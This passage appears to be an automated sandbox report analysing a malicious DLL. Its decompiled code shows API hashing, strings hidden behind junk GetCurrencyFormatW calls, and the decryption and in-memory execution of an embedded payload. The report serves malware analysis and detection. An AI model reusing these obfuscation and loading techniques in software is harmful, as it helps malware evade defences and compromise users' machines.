0x100113e6
0x100113ec

APIs

EnterCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113BE
InitializeCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113CD
LeaveCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113DA
EnterCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113E6

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: 5a71d8f3468c054b32200986d24b874c32abe560b93976940e53b78127281ca9
Instruction ID: 2a1b714fc97c26e45b6e87192a60087c5aec0faa5666cee140badcbafd2b3ba5
Opcode Fuzzy Hash: 5a71d8f3468c054b32200986d24b874c32abe560b93976940e53b78127281ca9
Instruction Fuzzy Hash: BFF0F6735001288FD6409F54CC8475DB7AAFB82395F56482AE1508A056CF31D681C769

Uniqueness

Uniqueness Score: -1.00%

Function 100105F0 Relevance: 5.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100105F0(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x10048600
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

0x100105f2
0x100105f5
0x100105f5
0x100105f9
0x100105ff
0x10010605
0x1001062e
0x1001062f
0x00000000
0x10010635
0x10010607
0x1001060a
0x00000000
0x00000000
0x1001060e
0x10010616
0x00000000
0x1001061d
0x10010624
0x00000000
0x1001062a

APIs

EnterCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 100105F9
TlsGetValue.KERNEL32(100485E4,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001060E
LeaveCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 10010624
LeaveCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001062F

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 79950d59dfa9a72b6c2f18be47bb30787cadad7b00379f75649d28e861df6bfe
Instruction ID: 62d6a443bb2e53cdd0c433372c742529333c02fcab520335ef35924ea7a93314
Opcode Fuzzy Hash: 79950d59dfa9a72b6c2f18be47bb30787cadad7b00379f75649d28e861df6bfe
Instruction Fuzzy Hash: C2F0127A3005109FD321CF64CC8884A73E9FFC839171A8866F8819B123DB71F895CB60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 1460, Parent PID: 1212COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	453
Total number of Limit Nodes:	15

Executed Functions

Function 100042F6 Relevance: 133.6, APIs: 46, Strings: 30, Instructions: 598
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E100042F6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, intOrPtr _a8) {
				signed int _v4;
				int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				char _v32;
				int _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				char _v56;
				int _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				struct HINSTANCE__* _v80;
				signed int _v84;
				int _v88;
				void* _v92;
				signed int _t177;
				int _t183;
				int _t185;
				intOrPtr _t277;
				struct HRSRC__* _t278;
				long _t280;
				signed int _t285;
				long _t291;
				void* _t292;
				void* _t294;
				intOrPtr _t298;
				short* _t312;
				void* _t314;
				void* _t321;
				short* _t326;
				signed int _t330;
				void* _t334;
				intOrPtr _t338;

				_t322 = __esi;
				_t319 = __edi;
				_t318 = __edx;
				_t314 = __ecx;
				_t311 = __ebx;
				_t330 =  &_v92;
				_t177 =  *0x10045580; // 0x771f5646
				_v4 = _t177 ^ _t330;
				_v80 = _a4;
				_t336 = _a8 != 1;
				if(_a8 != 1) {
					L6:
					_t183 = 1;
				} else {
					_t185 = E100036FA(__ebx, __esi, _t336);
					_t337 = _t185;
					if(_t185 != 0) {
						_push(0x10036c38);
						E10020633(__ebx, __edx, __edi, __esi, __eflags);
						_t183 = 0;
						__eflags = 0;
					} else {
						_push(__ebx);
						_push(__ebp);
						_push(__esi);
						_push(__edi);
						_t326 = L"xadqsavcbdfewescGADW";
						_t312 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
						 *0x100440cc = _t185;
						 *0x100440d0 = _t185;
						 *0x100440d4 = _t185;
						 *0x100440dc = _t185;
						 *0x100440d8 = _t185;
						 *0x100440e0 = _t185;
						 *0x100440e4 = _t185;
						_v32 = 0x417;
						_v30 = 0x44e;
						_v28 = 0x451;
						_v26 = 0x43a;
						_v24 = 0x416;
						_v22 = 0x401;
						_v20 = 0x448;
						_v18 = 0x428;
						_v16 = 0x44e;
						_v14 = 0x41a;
						_v12 = 0x41f;
						_v10 = 0x441;
						_v8 = _t185;
						_v76 = 0x42a;
						_v74 = 0x442;
						_v72 = 0x423;
						_v70 = 0x44e;
						_v68 = 0x448;
						_v66 = 0x44f;
						_v64 = 0x42c;
						_v62 = 0x43b;
						_v60 = 0x442;
						_v58 = _t185;
						_v56 = 0x442;
						_v54 = 0x44a;
						_v52 = 0x43f;
						_v50 = 0x448;
						_v48 = 0x423;
						_v46 = 0x437;
						_v44 = 0x43d;
						_v42 = 0x43a;
						_v40 = 0x451;
						_v38 = 0x442;
						_v36 = _t185;
						 *((short*)(_t330 + 0x64 + GetCurrencyFormatW(_t185, 0x11d4, _t312, _t185, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6b;
						 *((short*)(_t330 + 0x66 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x65;
						 *((short*)(_t330 + 0x60 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x72;
						 *((short*)(_t330 + 0x6a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6e;
						 *((short*)(_t330 + 0x6c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x65;
						 *((short*)(_t330 + 0x6e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x70 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x33;
						 *((short*)(_t330 + 0x72 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x32;
						 *((short*)(_t330 + 0x74 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x2e;
						 *((short*)(_t330 + 0x76 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x64;
						 *((short*)(_t330 + 0x78 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x72 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x38 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6e;
						 *((short*)(_t330 + 0x3a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x74;
						 *((short*)(_t330 + 0x3c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x64;
						 *((short*)(_t330 + 0x3e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x42 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x2e;
						 *((short*)(_t330 + 0x44 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x64;
						 *((short*)(_t330 + 0x46 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x4c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6d;
						 *((short*)(_t330 + 0x4e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x73;
						 *((short*)(_t330 + 0x50 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x76;
						 *((short*)(_t330 + 0x52 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x63;
						 *((short*)(_t330 + 0x54 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x72;
						 *((short*)(_t330 + 0x56 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x74;
						 *((short*)(_t330 + 0x58 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x2e;
						 *((short*)(_t330 + 0x5a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x64;
						 *((short*)(_t330 + 0x54 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x46 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6c;
						_v92 = E10001534(_t314, _t337, 0x28b4cee6, 0x31c6c0a1, 0x628ad09, 0x1a322e2e, 0x3801a8f2,  &_v32);
						_v84 = E10001534(_t314, _t337, 0x3446e98c, 0x348b2998, 0x118db97f, 0x2d34cc91, 0x1c9cdc39,  &_v76);
						_v88 = E10001534(_t314, _t337, 0x106d66fc, 0x108d4cdc, 0x156af904, 0x20e23fe3, 0xe094f82,  &_v56);
						 *0x10046a74 = E10001688(_t254, 0x4cba7001);
						 *0x10046a70 = E10001688(_v88, 0x4e026ffd);
						 *0x10046a64 = E10001688(_v88, 0xc066615c);
						 *0x10046a54 = E10001688(_v88, 0xdad370ab);
						 *0x10046a68 = E10001688(_v88, 0x3762b189);
						 *0x10046a80 = E10001688(_v88, 0x4ec2add7);
						 *0x10046a2c = E10001688(_v88, 0x4e6ab1d2);
						 *0x10046a30 = E10001688(_v92, 0x626d0ab3);
						 *0x10046a3c = E10001688(_v92, 0x491ca2f6);
						 *0x10046a58 = E10001688(_v92, 0x74860909);
						 *0x10046a50 = E10001688(_v92, 0x13c17412);
						 *0x10046a4c = E10001688(_v92, 0x4a42047a);
						 *0x10046a5c = E10001688(_v92, 0x4d093b11);
						 *0x10046a84 = E10001688(_v92, 0x1f051606);
						 *0x10046a40 = E10001688(_v92, 0xdd86ddbc);
						 *0x10046a38 = E10001688(_v84, 0x3ed46385);
						 *0x10046a7c = E10001688(_v92, 0x417f6a7d);
						 *0x10046a78 = E10001688(_v92, 0xb88a2b15);
						 *0x10046a60 = E10001688(_v92, 0x3fbe89a1);
						 *0x10046a34 = E10001688(_v92, 0xbcc9930d);
						 *0x10046a6c = E10001688(_v92, 0x2c4bdae9);
						 *0x10046a48 = E10001688(_v92, 0x640963da);
						_t277 = E10001688(_v92, 0xfa5d867);
						_t334 = _t330 + 0x100;
						 *0x10046a44 = _t277; // executed
						_t278 = FindResourceW(_v80, 0x3275, 0x10036c5c); // executed
						_v84 = _t278;
						_v92 = LoadResource(_v80, _t278);
						_t280 = SizeofResource(_v80, _v84);
						_push(0x22b9);
						_push(_t326);
						_v88 = _t280;
						_t338 =  *0x10046a3c; // 0x76c866e0
						_push(0);
						_push(_t312);
						_push(0x11d4);
						_push(0);
						if(_t338 == 0) {
							_v84 = GetCurrencyFormatW() *  *0x100440d0 + 0x2000;
							_t285 = GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9);
							_t291 = GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc + 0x00001000 | _v84;
							__eflags = _t291;
							_t292 = VirtualAlloc(0, _v88, _t291, _t285 *  *0x100440cc + 0x40);
						} else {
							_v84 = GetCurrencyFormatW() *  *0x100440e0 + 0x2000;
							_t292 =  *0x10046a3c(0xffffffff, 0, _v88, GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc + 0x00001000 | _v84, GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 + 0x40, 0); // executed
						}
						_t313 = _v88;
						_t324 = _t292;
						memcpy(_t292, _v92, _v88);
						_t294 = malloc(0x4708); // executed
						_t321 = _t294;
						E100018D8(0xed9e0cf, 0x96c3a441, 0x245e78a3, _t321, "u+OUr@Gnw7WU8wvzF2sdn!scsb&WO4vzuGAs+!StYXj!by7msWucK*_MI_o)m(", 0x3f);
						E10001B36(0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t321, _t292, _v88);
						 *0x10046a64(_t321);
						_t298 = E100042CA(_t324, _t313);
						_t330 = _t334 + 0x4c;
						 *0x10046a8c = _t298;
						 *0x10046a88(_v80);
						_pop(_t319);
						_t322 = 1;
						_t311 = 0;
						goto L6;
					}
				}
				return E1001FBB5(_t183, _t311, _v4 ^ _t330, _t318, _t319, _t322);
			}

APIs

Part of subcall function 100036FA: _malloc.LIBCMT ref: 10003700

GetCurrencyFormatW.KERNEL32 ref: 10004452
GetCurrencyFormatW.KERNEL32 ref: 1000446E
GetCurrencyFormatW.KERNEL32 ref: 1000448A
GetCurrencyFormatW.KERNEL32 ref: 100044A6
GetCurrencyFormatW.KERNEL32 ref: 100044C2
GetCurrencyFormatW.KERNEL32 ref: 100044DE
GetCurrencyFormatW.KERNEL32 ref: 100044FA
GetCurrencyFormatW.KERNEL32 ref: 10004516
GetCurrencyFormatW.KERNEL32 ref: 10004532
GetCurrencyFormatW.KERNEL32 ref: 1000454E
GetCurrencyFormatW.KERNEL32 ref: 1000456A
GetCurrencyFormatW.KERNEL32 ref: 10004586
GetCurrencyFormatW.KERNEL32 ref: 100045A2
GetCurrencyFormatW.KERNEL32 ref: 100045BE
GetCurrencyFormatW.KERNEL32 ref: 100045DA
GetCurrencyFormatW.KERNEL32 ref: 100045F6
GetCurrencyFormatW.KERNEL32 ref: 10004612
GetCurrencyFormatW.KERNEL32 ref: 1000462E
GetCurrencyFormatW.KERNEL32 ref: 1000464A
GetCurrencyFormatW.KERNEL32 ref: 10004666
GetCurrencyFormatW.KERNEL32 ref: 10004682
GetCurrencyFormatW.KERNEL32 ref: 1000469E
GetCurrencyFormatW.KERNEL32 ref: 100046BA
GetCurrencyFormatW.KERNEL32 ref: 100046D6
GetCurrencyFormatW.KERNEL32 ref: 100046F2
GetCurrencyFormatW.KERNEL32 ref: 1000470E
GetCurrencyFormatW.KERNEL32 ref: 1000472A
GetCurrencyFormatW.KERNEL32 ref: 10004746
GetCurrencyFormatW.KERNEL32 ref: 10004762
GetCurrencyFormatW.KERNEL32 ref: 1000477E
GetCurrencyFormatW.KERNEL32 ref: 1000479A

Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 1000155F
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 100015B5
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 100015DF
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001606
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001639
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001668

Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016B0
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016D0
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016E8
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001710
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001731
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001757
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001770
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 1000179B

Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017B7
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017DF
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017FA
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001826
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001844
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001879

Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001899
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100018BE

FindResourceW.KERNELBASE(?,00003275,10036C5C), ref: 100049EB
LoadResource.KERNEL32(?,00000000), ref: 100049FA
SizeofResource.KERNEL32(?,?), ref: 10004A0C
GetCurrencyFormatW.KERNEL32 ref: 10004A2A
GetCurrencyFormatW.KERNEL32 ref: 10004A49
GetCurrencyFormatW.KERNEL32 ref: 10004A62
VirtualAllocExNuma.KERNEL32(000000FF,00000000,?,?), ref: 10004A7C
GetCurrencyFormatW.KERNEL32 ref: 10004A84
GetCurrencyFormatW.KERNEL32 ref: 10004AA2
GetCurrencyFormatW.KERNEL32 ref: 10004ABB
VirtualAlloc.KERNEL32(00000000,?,?), ref: 10004AD3
memcpy.MSVCRT ref: 10004AE5
malloc.MSVCRT ref: 10004AF0
??3@YAXPAX@Z.MSVCRT ref: 10004B2F
_printf.LIBCMT ref: 10004B60

Strings

n, xrefs: 100045B7
d, xrefs: 10004563
l, xrefs: 10004598
., xrefs: 10004643
l, xrefs: 10004790
e, xrefs: 10004483
e, xrefs: 100044D7
u+OUr@Gnw7WU8wvzF2sdn!scsb&WO4vzuGAs+!StYXj!by7msWucK*_MI_o)m(, xrefs: 10004AF8
., xrefs: 10004547
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 1000433A, 1000433F, 10004463, 1000447F, 1000449B, 100044B7, 100044D3, 100044EF, 1000450B, 10004527, 10004543, 1000455F, 1000457B, 10004597, 100045B3, 100045CF, 100045EB, 10004607, 10004623, 1000463F, 1000465B, 10004677, 10004693, 100046AF, 100046CB, 100046E7, 10004703, 1000471F, 1000473B, 10004757, 10004773, 1000478F, 10004A25, 10004A46, 10004A5F, 10004A95, 10004AB8
s, xrefs: 100046CF
c, xrefs: 10004707
k, xrefs: 10004467
l, xrefs: 10004694
n, xrefs: 100044BB
t, xrefs: 100045D3
v, xrefs: 100046EB
t, xrefs: 1000473F
d, xrefs: 1000465F
l, xrefs: 100044F3
l, xrefs: 1000457F
., xrefs: 1000475B
xadqsavcbdfewescGADW, xrefs: 10004333, 10004338, 10004460, 1000447C, 10004498, 100044B4, 100044D0, 100044EC, 10004508, 10004524, 10004540, 1000455C, 10004578, 10004594, 100045B0, 100045CC, 100045E8, 10004604, 10004620, 1000463C, 10004658, 10004674, 10004690, 100046AC, 100046C8, 100046E4, 10004700, 1000471C, 10004738, 10004754, 10004770, 1000478C, 10004A17, 10004A44, 10004A5B, 10004A92, 10004AB4
l, xrefs: 1000460B
3, xrefs: 1000450F
d, xrefs: 100045EF
m, xrefs: 100046B3
r, xrefs: 1000449C
l, xrefs: 100047A3
d, xrefs: 10004777

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat$Resource$AllocVirtual$??3@FindLoadNumaSizeof_malloc_printfmallocmemcpy
String ID: .$.$.$3$c$d$d$d$d$e$e$eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$k$l$l$l$l$l$l$l$m$n$n$r$s$t$t$u+OUr@Gnw7WU8wvzF2sdn!scsb&WO4vzuGAs+!StYXj!by7msWucK*_MI_o)m($v$xadqsavcbdfewescGADW
API String ID: 3325861097-4060776750
Opcode ID: 66ea2a91fe368a831aadb18a4e90e5ef0f40db8b5cb4f279c8b13da558b103b3
Instruction ID: abf1217519c19ffa8c1e819e0abff0726c6fc8cdfe709489ff9e1ea74d27783b
Opcode Fuzzy Hash: 66ea2a91fe368a831aadb18a4e90e5ef0f40db8b5cb4f279c8b13da558b103b3
Instruction Fuzzy Hash: 8922A074544314BAF315DB91CE8AF0BBBECEF8A744F015509F740AA2A0D772A5248F6B

Uniqueness

Uniqueness Score: -1.00%

Function 100039A9 Relevance: 111.0, APIs: 60, Strings: 3, Instructions: 767
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E100039A9(void* __eflags, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* _v0;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				int _v48;
				intOrPtr* _v52;
				int _v56;
				int _v60;
				intOrPtr* _v64;
				void* __esi;
				signed int _t155;
				signed int _t166;
				signed int _t186;
				int _t187;
				signed int _t193;
				signed int _t198;
				void* _t202;
				signed int _t205;
				signed int _t210;
				int _t223;
				signed int _t224;
				signed int _t227;
				intOrPtr* _t234;
				signed int _t235;
				intOrPtr _t238;
				signed int _t242;
				signed int _t275;
				signed int _t283;
				signed short* _t286;
				intOrPtr* _t302;
				signed int _t306;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t323;
				int _t336;
				int _t343;
				intOrPtr* _t407;
				short* _t447;
				int* _t448;
				int* _t449;

				_t448 =  &_v60;
				_t447 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v44 = 0;
				_t155 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _a8, _t155 *  *0x100440d0 + 0x40) != 0) {
					if(( *_a4 & 0x0000ffff) != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x5a4d) {
						goto L1;
					}
					_t166 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
					if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _a8, _t166 *  *0x100440d8 + _a4[0x1e] + 0xf8) == 0) {
						goto L1;
					}
					_v56 = _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + _a4[0x1e];
					if( *_v56 != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 0x4550 || ( *(_v56 + 4) & 0x0000ffff) != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + 0x14c || ( *(_v56 + 0x38) & GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x00000001) != 0) {
						goto L1;
					} else {
						_t186 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t187 = _v56;
						_v40 =  *((intOrPtr*)(_t187 + 0x38));
						_v52 = ( *(_t187 + 0x14) & 0x0000ffff) + _t186 *  *0x100440d8 * 0x28 + _t187 + 0x18;
						_v48 = 0;
